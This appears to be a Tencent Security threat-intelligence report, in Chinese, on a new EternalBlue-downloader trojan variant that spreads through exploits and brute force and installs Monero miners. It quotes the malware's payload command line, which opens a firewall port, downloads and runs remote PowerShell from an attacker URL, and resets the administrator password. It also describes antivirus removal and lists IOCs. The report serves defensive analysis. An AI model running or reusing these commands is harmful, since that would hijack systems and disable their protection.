一、背景
腾讯安全威胁情报中心检测到永恒之蓝下载器木马再次出现新变种,此次变种利用Python打包EXE可执行文件进行攻击,该组织曾在2018年底使用过类似手法。腾讯安全大数据监测数据显示,永恒之蓝下载器最新变种出现之后便迅速传播,目前已感染约1.5万台服务器,中毒系统最终用于下载运行门罗币挖矿木马。
永恒之蓝下载器木马在不断演进更新过程中,曾将EXE攻击方式逐步切换到利用Powershell脚本实现无文件攻击。在其功能越来越庞大之后,该黑产团伙再次将永恒之蓝漏洞攻击利用、mssql爆破攻击的代码重新添加到EXE木马中,并对Powershell中相关代码进行屏蔽。
被本次变种攻击失陷后的系统会下载if.bin、下载运行由随机字符串命名的EXE攻击模块进行大规模的漏洞扫描和攻击传播,同时会下载门罗币挖矿木马占用服务器大量CPU资源挖矿,会给受害企业造成严重生产力损失。
附:永恒之蓝下载器木马历次版本更新情况如下:
|
时间 |
主要功能更新 |
|
2018年12月14日 |
利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。 |
|
2018年12月19日 |
下载之后的木马新增Powershell后门安装。 |
|
2019年1月9日 |
检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 |
|
2019年1月24日 |
木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。 |
|
2019年1月25日 |
木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。 |
|
2019年2月10日 |
将攻击模块打包方式改为Pyinstaller。 |
|
2019年2月20日 |
更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。 |
|
2019年2月23日 |
攻击方法再次更新,新增MsSQL爆破攻击。 |
|
2019年2月25日 |
在2月23日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。 |
|
2019年3月6日 |
通过已感染机器后门更新Powershell脚本横向传播模块ipc。 |
|
2019年3月8日 |
通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 |
|
2019年3月14日 |
通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 |
|
2019年3月28日 |
更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 |
|
2019年4月3日 |
开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。 |
|
2019年7月19日 |
无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击,感染启动盘和网络共享盘,新增MsSQL爆破攻击。 |
|
2019年10月9日 |
新增Bluekeep漏洞CVE-2019-0708检测上报功能。 |
|
2020年2月12日 |
使用DGA域名,篡改hosts文件。 |
|
2020年4月3日 |
新增钓鱼邮件传播,邮件附件urgent.doc包含Office漏洞CVE-2017-8570。 |
|
2020年4月17日 |
钓鱼邮件新增附件readme.zip、readme.doc,新增Bypass UAC模块7p.php,创建readme.js文件感染可移动盘、网络共享盘 |
|
2020年5月21日 |
新增SMBGhost漏洞CVE-2020-0796检测上报功能,新增SSH爆破代码(未调用)。 |
|
2020年6月10日 |
新增SMBGhost漏洞CVE-2020-0796利用攻击,新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。 |
|
2020年6月24日 |
重新使用Python打包EXE攻击模块20.dat(C:\Windows\Temp\<random>.exe),负责永恒之蓝漏洞攻击、$IPC、SMB、mssql爆破攻击,其他攻击方式仍然通过Powershell实现。 |
二、样本分析
永恒之蓝下载器木马在Powershell攻击代码中,将扫描445端口进行攻击的$IPC爆破和永恒之蓝漏洞利用攻击功能进行了屏蔽。但以下功能仍然保留:
1.“永恒之蓝”漏洞利用MS17-010
2.Lnk漏洞利用CVE-2017-8464
3.Office漏洞利用CVE-2017-8570
4.RDP爆破
5.感染可移动盘、网络磁盘
6.钓鱼邮件(使用新冠病毒疫情相关主题)
7.SMBGhost漏洞利用CVE-2020-0796
8.SSH爆破攻击Linux系统
9.Redis未授权访问漏洞攻击Linux系统
![图片[1]-永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器 – 作者:腾讯电脑管家-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200714/1594694085.png)
然后在攻击后执行的Payload中添加一行代码,负责下载和执行EXE攻击模块
http[:]//d.ackng.com/ode.bin。
![图片[2]-永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器 – 作者:腾讯电脑管家-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200714/1594694098.png)
Ode.bin是经过加密的Powershell代码,解密后的内容主要完成以下功能:
- 生成4到8位字符组成的随机字符串作为文件名<random>.exe;
- 从http[:]//167.71.87.85/20.dat下载文件保存至C:\Windows\Temp\<random>.exe;
- 如果符合权限则创建计划任务”\Microsoft\Windows\<random>.exe “每50分钟执行一次dat,如果不符合权限则创建C:\Windows\Temp\\tt.vbs,通过VBS脚本代码创建计划任务“<random>.exe “,同样每50分钟执行一次20.dat。
![图片[3]-永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器 – 作者:腾讯电脑管家-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200714/1594694109.png)
通过计划任务执行的20.dat(拷贝至C:\Windows\Temp\<random>.exe md5: ef3a4697773f84850fe1a086db8edfe0)实际上是由Python代码打包的扫描攻击模块,与永恒之蓝下载器病毒2018年底第一次出现时的攻击模块C:\WINDOWS\Temp\svvhost.exe相似(参考https://www.freebuf.com/news/192015.html)。
该病毒在后来的逐步发展过程中,逐步将攻击代码转移到了Powershell实现,并且利用计划任务来动态获取和启动,不会在磁盘上留下文件,也就是“无文件攻击”模式攻击。而此次病毒重新启动exe攻击模块,可能是因为其功能不断扩展,需要将一部分代码进行分割,切割后的攻击模块及功能如下图所示。
![图片[4]-永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器 – 作者:腾讯电脑管家-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200714/1594694121.png)
If.bin中的Powershell攻击代码与上个版本相同,此处不再分析,分割出的xxx.exe中解码出Python实现的永恒之蓝漏洞攻击代码如下,另外还会执行$IPC、SMB、mssql弱口令爆破攻击:
![图片[5]-永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器 – 作者:腾讯电脑管家-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200714/1594694131.png)
攻击成功后执行shellcode
下载和执行Powershell代码jsp;
修改administrator账户登陆密码为k8d3j9SjfS7并激活administrator账户;
添加防火墙规则允许65529端口访问并开启监听。
cmd.exe /c netsh.exe firewall add portopening tcp 65529 DNS&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53&powershell IEX(New-Object Net.WebClient).DownloadString(‘http[:]//t.amynx.com/gim.jsp’)&net user administrator k8d3j9SjfS7&net user administrator /active:yes
![图片[6]-永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器 – 作者:腾讯电脑管家-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200714/1594694141.png)
gim.jsp是经过加密的Powershell代码,首先检测系统是否安装了以下杀软,如有调用卸载程序进行卸载:
Eset、Kaspersky、avast、avp、Security、AntiVirus、Norton Security、Anti-Malware
![图片[7]-永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器 – 作者:腾讯电脑管家-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200714/1594694153.png)
然后安装一个计划任务“blackball”和一个随机名计划任务,定期下载和执行a.jsp(a.jsp继续下载和执行挖矿和攻击模块)。
![图片[8]-永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器 – 作者:腾讯电脑管家-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200714/1594694162.png)
IOCs
Domain
info.zz3r0.com
info.amynx.com
w.zz3r0.com
IP
167.71.87.85
URL
http[:]//167.71.87.85/20.dat
http[:]//d.ackng.com/ode.bin
http[:]//d.ackng.com/if.bin
http[:]//t.amynx.com/gim.jsp
http[:]//t.amynx.com/smgho.jsp
http[:]//t.amynx.com/a.jsp
md5
C:\Windows\Temp\<random>.exe
ef3a4697773f84850fe1a086db8edfe0
8ec20f2cbad3103697a63d4444e5c062
ac48b1ea656b7f48c34e66d8e8d84537
d61d88b99c628179fa7cf9f2a310b4fb
f944742b01606605a55c1d55c469f0c9
abd6f640423a9bf018853a2b40111f76
57812bde13f512f918a0096ad3e38a07
d8e643c74996bf3c88325067a8fc9d78
125a6199fd32fafec11f812358e814f2
fb880dc73e4db0a43be8a68ea443bfe1
8d46dbe92242a4fde2ea29cc277cca3f
48fbe4b6c9a8efc11f256bda33f03460
gim.jsp
98f48f31006be66a8e07b0ab189b6d02
a.jsp
6bb4e93d29e8b78e51565342b929c824
ode.bin
e009720bd4ba5a83c4b0080eb3aea1fb
if.bin
092478f1e16cbddb48afc3eecaf6be68
smgho.jsp
ca717602f0700faba6d2fe014c9e6a8c
参考链接:
《“黑球”行动再升级,SMBGhost漏洞攻击进入实战》
https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA
来源:freebuf.com 2020-07-14 15:15:28 by: 腾讯电脑管家
请登录后发表评论
注册